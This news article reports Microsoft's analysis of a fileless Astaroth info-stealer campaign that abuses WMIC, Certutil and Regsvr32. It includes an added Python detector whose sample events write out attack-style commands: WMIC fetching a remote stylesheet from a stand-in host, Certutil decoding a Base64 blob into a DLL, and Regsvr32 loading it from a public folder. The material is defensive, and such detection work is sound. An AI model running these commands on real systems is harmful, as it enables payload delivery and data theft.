A fileless malware campaign used by attackers to drop the information-stealing Astaroth Trojan into the memory of infected computers was detected by researchers from the Microsoft Defender ATP Research Team.
The Astaroth Trojan and info-stealer is a malware strain capable of stealing sensitive information such as user credentials from its victims using a keylogger module, interception of operating system calls, and clipboard monitoring.
Astaroth is also known for abusing living-off-the-land binaries (LOLBins) such as the Windows Management Instrumentation Command-line (WMIC) utility to stealthily download and install malware payloads in the background.
We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf
— Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019
The malware campaign discovered by the Microsoft Defender ATP Research Team uses several fileless techniques and a multi-stage infection process that begins with a spear-phishing email containing a malicious link that leads potential victims to an LNK file.
The malicious payloads downloaded in the background are all Base64-encoded and are decoded on the compromised system using the legitimate Certutil tool, yielding DLLs, the first of which is loaded with the help of the Regsvr32 tool.
The loaded DLL then loads a second DLL into memory, which reflectively loads a third one designed to decrypt and inject yet another DLL into Userinit. This fourth DLL acts as a proxy that reflectively loads a fifth DLL into memory using process hollowing.
This fifth and final DLL is the actual Astaroth info-stealer payload, which collects various types of sensitive data from its victims and exfiltrates it to command-and-control (C2) servers operated by the attackers.
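A detection-side view of the chain just described, as an added example that is not part of the original report or of any Microsoft tooling: the Python below runs three heuristics over constructed process-creation records (shaped like Sysmon Event ID 1) and then correlates hits along the parent-process chain, so that a single Certutil or Regsvr32 use is not enough on its own but a WMIC downloader whose children decode and register a DLL from a user-writable path is. The command-line patterns (WMIC's /format switch pointing at a URL, Certutil's -decode, Regsvr32 loading from a user-writable directory), the rule names and the sample events are assumptions for illustration, not indicators taken from the report.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record, with the fields a Sysmon Event ID 1 carries."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Heuristics for the LOLBins named in the article. The patterns are assumptions
# about how these tools are commonly abused, not indicators from the report.
def wmic_remote_format(e: ProcEvent) -> bool:
    # WMIC asked to apply a stylesheet fetched over HTTP(S): WMIC as a downloader.
    return _basename(e.image) == "wmic.exe" and \
        re.search(r'/format:\s*"?https?://', e.cmdline, re.I) is not None


def certutil_decode(e: ProcEvent) -> bool:
    # Certutil used to turn a Base64 blob into a file rather than handle certificates.
    return _basename(e.image) == "certutil.exe" and \
        re.search(r"\s-decode(hex)?\b", e.cmdline, re.I) is not None


def regsvr32_userwritable(e: ProcEvent) -> bool:
    # Regsvr32 registering a DLL that lives in a user-writable location.
    return _basename(e.image) == "regsvr32.exe" and \
        re.search(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp|users\\public)\\",
                  e.cmdline, re.I) is not None


RULES = {
    "wmic_remote_format": wmic_remote_format,
    "certutil_decode": certutil_decode,
    "regsvr32_userwritable": regsvr32_userwritable,
}


def match_rules(events):
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    hits = {}
    for e in events:
        names = [name for name, pred in RULES.items() if pred(e)]
        if names:
            hits[e.pid] = names
    return hits


def ancestor_pids(events, pid):
    """Walk ppid links upward and return the ancestor pids, nearest first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], {pid}
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        chain.append(cur.ppid)
        cur = by_pid[cur.ppid]
    return chain


def suspicious_chains(events, threshold=2):
    """Flag a process when it and its ancestors together trip `threshold` distinct rules."""
    hits = match_rules(events)
    flagged = {}
    for pid, names in hits.items():
        rules = set(names)
        for anc in ancestor_pids(events, pid):
            rules.update(hits.get(anc, []))
        if len(rules) >= threshold:
            flagged[pid] = sorted(rules)
    return flagged


# Constructed sample telemetry (not real events): one LOLBin chain rooted at a
# WMIC downloader, plus two benign uses of the same tools from Explorer.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wbem\wmic.exe",
              'wmic os get /format:"http://example.invalid/v.xsl"'),
    ProcEvent(300, 200, r"C:\Windows\System32\certutil.exe",
              r"certutil -decode C:\Users\Public\Libraries\r1.log C:\Users\Public\Libraries\r1.dll"),
    ProcEvent(400, 200, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s C:\Users\Public\Libraries\r1.dll"),
    ProcEvent(500, 100, r"C:\Windows\System32\certutil.exe",
              r"certutil -verify C:\Users\alice\Desktop\cert.cer"),
    ProcEvent(600, 100, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s C:\Windows\System32\msxml3.dll"),
]

if __name__ == "__main__":
    for pid, rules in suspicious_chains(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(rules)}")
```

The threshold is the design point: `certutil -decode` and Regsvr32 both turn up in legitimate administration, so each heuristic alone is noisy, while two different LOLBin abuses linked by a parent-child relationship are the "bag of money moving by itself" the researchers describe. A real deployment would also want the LNK's parent (Explorer launching a shortcut from a download location) and the Userinit injection as further stages, which this example leaves out.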
"It's interesting to note that at no point during the attack chain is any file run that's not a system tool. This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity," the researchers added.
Microsoft's researchers describe only the initial and execution stages of the attack in their report, since they focused on how the Trojan infection was detected and blocked by Microsoft Defender ATP.
The protection features and technologies Microsoft Defender ATP used to stop the infection are laid out in a graph that details, stage by stage, the features used to detect and block an Astaroth infection on affected Windows computers.
The Microsoft Defender ATP Research Team also enumerates the techniques used in the Astaroth fileless attack at each infection stage and the Windows tools employed to stealthily advance the infection on compromised systems.
As Microsoft Defender ATP Research's Andrea Lelli concluded, "abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would."
Back in February, another Astaroth campaign was observed by Cybereason abusing security and anti-malware products, as well as living-off-the-land techniques and living-off-the-land binaries (LOLBins), to steal information from European and Brazilian targets.
Cofense's Phishing Defense Center (PDC) also observed a malspam campaign distributing Astaroth in September 2018 that exclusively targeted South American victims, with around 8,000 machines potentially compromised within a single week of attacks.
Update July 09: Added information on the Astaroth campaign discovered by Cofense in 2018.